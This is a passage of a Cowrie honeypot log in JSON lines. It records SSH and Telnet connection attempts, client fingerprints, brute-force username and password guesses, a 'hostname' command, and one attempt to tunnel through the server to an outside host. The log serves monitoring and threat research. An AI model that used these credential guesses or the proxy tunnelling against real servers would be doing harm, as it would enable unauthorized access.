{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T04:19:57.277920Z","src_ip":"80.94.95.15","session":"78fb2a5f9485"}
{"eventid":"cowrie.session.connect","src_ip":"195.178.110.224","src_port":54230,"dst_ip":"1.2.3.4","dst_port":22,"session":"2a1596cb5dd8","protocol":"ssh","message":"New connection: 195.178.110.224:54230 (1.2.3.4:22) [session: 2a1596cb5dd8]","sensor":"my-vps","timestamp":"2025-08-28T04:20:11.344287Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T04:20:11.345264Z","src_ip":"195.178.110.224","session":"2a1596cb5dd8"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-28T04:20:11.365116Z","src_ip":"195.178.110.224","session":"2a1596cb5dd8"}
{"eventid":"cowrie.login.failed","username":"sol","password":"sol123","message":"login attempt [sol/sol123] failed","sensor":"my-vps","timestamp":"2025-08-28T04:20:11.426054Z","src_ip":"195.178.110.224","session":"2a1596cb5dd8"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T04:20:12.448135Z","src_ip":"195.178.110.224","session":"2a1596cb5dd8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55431,"dst_ip":"1.2.3.4","dst_port":23,"session":"8415c1327d4a","protocol":"telnet","message":"New connection: 212.227.235.229:55431 (1.2.3.4:23) [session: 8415c1327d4a]","sensor":"my-vps","timestamp":"2025-08-28T04:21:08.183444Z"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":61446,"dst_ip":"1.2.3.4","dst_port":22,"session":"b122988c8b8c","protocol":"ssh","message":"New connection: 217.72.205.35:61446 (1.2.3.4:22) [session: b122988c8b8c]","sensor":"my-vps","timestamp":"2025-08-28T04:21:33.072261Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T04:21:33.073295Z","src_ip":"217.72.205.35","session":"b122988c8b8c"}
{"eventid":"cowrie.session.closed","duration":30.73947024345398,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-28T04:21:38.922843Z","src_ip":"212.227.235.229","session":"8415c1327d4a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34436,"dst_ip":"1.2.3.4","dst_port":22,"session":"1e217ef03831","protocol":"ssh","message":"New connection: 212.227.235.229:34436 (1.2.3.4:22) [session: 1e217ef03831]","sensor":"my-vps","timestamp":"2025-08-28T04:26:16.719001Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T04:26:16.719975Z","src_ip":"212.227.235.229","session":"1e217ef03831"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-28T04:26:16.828313Z","src_ip":"212.227.235.229","session":"1e217ef03831"}
{"eventid":"cowrie.login.failed","username":"demo","password":"demo123456","message":"login attempt [demo/demo123456] failed","sensor":"my-vps","timestamp":"2025-08-28T04:26:17.158457Z","src_ip":"212.227.235.229","session":"1e217ef03831"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T04:26:18.268591Z","src_ip":"212.227.235.229","session":"1e217ef03831"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":63181,"dst_ip":"1.2.3.4","dst_port":22,"session":"6c9d7361f689","protocol":"ssh","message":"New connection: 212.227.235.229:63181 (1.2.3.4:22) [session: 6c9d7361f689]","sensor":"my-vps","timestamp":"2025-08-28T04:27:46.357787Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T04:27:46.358886Z","src_ip":"212.227.235.229","session":"6c9d7361f689"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T04:27:46.522538Z","src_ip":"212.227.235.229","session":"6c9d7361f689"}
{"eventid":"cowrie.login.failed","username":"sage","password":"sage","message":"login attempt [sage/sage] failed","sensor":"my-vps","timestamp":"2025-08-28T04:27:48.286736Z","src_ip":"212.227.235.229","session":"6c9d7361f689"}
{"eventid":"cowrie.login.failed","username":"sage","password":"sage1","message":"login attempt [sage/sage1] failed","sensor":"my-vps","timestamp":"2025-08-28T04:27:50.999489Z","src_ip":"212.227.235.229","session":"6c9d7361f689"}
{"eventid":"cowrie.login.failed","username":"sage","password":"sage123","message":"login attempt [sage/sage123] failed","sensor":"my-vps","timestamp":"2025-08-28T04:27:52.161548Z","src_ip":"212.227.235.229","session":"6c9d7361f689"}
{"eventid":"cowrie.login.failed","username":"sage","password":"sage1234","message":"login attempt [sage/sage1234] failed","sensor":"my-vps","timestamp":"2025-08-28T04:27:53.323128Z","src_ip":"212.227.235.229","session":"6c9d7361f689"}
{"eventid":"cowrie.login.failed","username":"sage","password":"sage12345","message":"login attempt [sage/sage12345] failed","sensor":"my-vps","timestamp":"2025-08-28T04:27:54.486075Z","src_ip":"212.227.235.229","session":"6c9d7361f689"}
{"eventid":"cowrie.session.closed","duration":"9.7","message":"Connection lost after 9.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T04:27:56.085657Z","src_ip":"212.227.235.229","session":"6c9d7361f689"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":50712,"dst_ip":"1.2.3.4","dst_port":22,"session":"2dc83adba2e1","protocol":"ssh","message":"New connection: 217.72.205.35:50712 (1.2.3.4:22) [session: 2dc83adba2e1]","sensor":"my-vps","timestamp":"2025-08-28T04:28:07.734098Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T04:28:07.735719Z","src_ip":"217.72.205.35","session":"2dc83adba2e1"}
{"eventid":"cowrie.session.connect","src_ip":"79.124.8.120","src_port":42792,"dst_ip":"1.2.3.4","dst_port":23,"session":"5a509d432575","protocol":"telnet","message":"New connection: 79.124.8.120:42792 (1.2.3.4:23) [session: 5a509d432575]","sensor":"my-vps","timestamp":"2025-08-28T04:28:20.519112Z"}
{"eventid":"cowrie.login.success","username":"root","password":"adminHW","message":"login attempt [root/adminHW] succeeded","sensor":"my-vps","timestamp":"2025-08-28T04:28:20.559040Z","src_ip":"79.124.8.120","session":"5a509d432575"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T04:28:20.631802Z","src_ip":"79.124.8.120","session":"5a509d432575"}
{"eventid":"cowrie.session.connect","src_ip":"186.225.142.90","src_port":50801,"dst_ip":"1.2.3.4","dst_port":22,"session":"876a499052c3","protocol":"ssh","message":"New connection: 186.225.142.90:50801 (1.2.3.4:22) [session: 876a499052c3]","sensor":"my-vps","timestamp":"2025-08-28T04:28:20.939362Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T04:28:21.758640Z","src_ip":"186.225.142.90","session":"876a499052c3"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T04:28:21.759313Z","src_ip":"186.225.142.90","session":"876a499052c3"}
{"eventid":"cowrie.login.success","username":"root","password":"088863222*!$#@","message":"login attempt [root/088863222*!$#@] succeeded","sensor":"my-vps","timestamp":"2025-08-28T04:28:24.576975Z","src_ip":"186.225.142.90","session":"876a499052c3"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T04:28:27.575022Z","src_ip":"186.225.142.90","session":"876a499052c3"}
{"eventid":"cowrie.command.input","input":"hostname","message":"CMD: hostname","sensor":"my-vps","timestamp":"2025-08-28T04:28:27.575774Z","src_ip":"186.225.142.90","session":"876a499052c3"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682","size":13,"shasum":"7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682","duplicate":true,"duration":"0.8","message":"Closing TTY Log: var/lib/cowrie/tty/7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682 after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T04:28:28.356305Z","src_ip":"186.225.142.90","session":"876a499052c3"}
{"eventid":"cowrie.session.closed","duration":"7.7","message":"Connection lost after 7.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T04:28:28.592459Z","src_ip":"186.225.142.90","session":"876a499052c3"}
{"eventid":"cowrie.session.connect","src_ip":"154.94.19.197","src_port":51882,"dst_ip":"1.2.3.4","dst_port":22,"session":"b39ae2f26a61","protocol":"ssh","message":"New connection: 154.94.19.197:51882 (1.2.3.4:22) [session: b39ae2f26a61]","sensor":"my-vps","timestamp":"2025-08-28T04:28:37.635096Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T04:28:37.635951Z","src_ip":"154.94.19.197","session":"b39ae2f26a61"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T04:28:37.894157Z","src_ip":"154.94.19.197","session":"b39ae2f26a61"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T04:28:45.635374Z","src_ip":"154.94.19.197","session":"b39ae2f26a61"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53082,"dst_ip":"1.2.3.4","dst_port":23,"session":"80927a8a4993","protocol":"telnet","message":"New connection: 212.227.235.229:53082 (1.2.3.4:23) [session: 80927a8a4993]","sensor":"my-vps","timestamp":"2025-08-28T04:31:19.809564Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38818,"dst_ip":"1.2.3.4","dst_port":23,"session":"ba80a104607d","protocol":"telnet","message":"New connection: 212.227.125.160:38818 (1.2.3.4:23) [session: ba80a104607d]","sensor":"my-vps","timestamp":"2025-08-28T04:31:20.280967Z"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":432,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T04:31:20.633021Z","src_ip":"79.124.8.120","session":"5a509d432575"}
{"eventid":"cowrie.session.closed","duration":180.1209123134613,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-28T04:31:20.640220Z","src_ip":"79.124.8.120","session":"5a509d432575"}
{"eventid":"cowrie.session.closed","duration":12.953525304794312,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-28T04:31:32.762882Z","src_ip":"212.227.235.229","session":"80927a8a4993"}
{"eventid":"cowrie.session.closed","duration":13.158350229263306,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-28T04:31:33.439255Z","src_ip":"212.227.125.160","session":"ba80a104607d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":9895,"dst_ip":"1.2.3.4","dst_port":22,"session":"ba8c450a823f","protocol":"ssh","message":"New connection: 212.227.235.229:9895 (1.2.3.4:22) [session: ba8c450a823f]","sensor":"my-vps","timestamp":"2025-08-28T04:31:42.205866Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T04:31:42.207184Z","src_ip":"212.227.235.229","session":"ba8c450a823f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":10220,"dst_ip":"1.2.3.4","dst_port":22,"session":"7bb12bc55249","protocol":"ssh","message":"New connection: 212.227.235.229:10220 (1.2.3.4:22) [session: 7bb12bc55249]","sensor":"my-vps","timestamp":"2025-08-28T04:31:42.341661Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T04:31:42.342427Z","src_ip":"212.227.235.229","session":"7bb12bc55249"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-28T04:31:42.476699Z","src_ip":"212.227.235.229","session":"7bb12bc55249"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-28T04:31:42.878299Z","src_ip":"212.227.235.229","session":"7bb12bc55249"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-28T04:31:43.011614Z","session":"7bb12bc55249"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42264,"dst_ip":"1.2.3.4","dst_port":22,"session":"c13a1d7c9c22","protocol":"ssh","message":"New connection: 212.227.235.229:42264 (1.2.3.4:22) [session: c13a1d7c9c22]","sensor":"my-vps","timestamp":"2025-08-28T04:32:52.229419Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T04:32:52.230414Z","src_ip":"212.227.235.229","session":"c13a1d7c9c22"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-28T04:32:52.338062Z","src_ip":"212.227.235.229","session":"c13a1d7c9c22"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T04:32:52.341839Z","src_ip":"212.227.235.229","session":"7bb12bc55249"}
{"eventid":"cowrie.login.failed","username":"deploy","password":"deploy","message":"login attempt [deploy/deploy] failed","sensor":"my-vps","timestamp":"2025-08-28T04:32:52.659273Z","src_ip":"212.227.235.229","session":"c13a1d7c9c22"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T04:32:53.766594Z","src_ip":"212.227.235.229","session":"c13a1d7c9c22"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":62740,"dst_ip":"1.2.3.4","dst_port":22,"session":"68618a69e82f","protocol":"ssh","message":"New connection: 212.227.125.160:62740 (1.2.3.4:22) [session: 68618a69e82f]","sensor":"my-vps","timestamp":"2025-08-28T04:34:40.478442Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T04:34:40.479727Z","src_ip":"212.227.125.160","session":"68618a69e82f"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 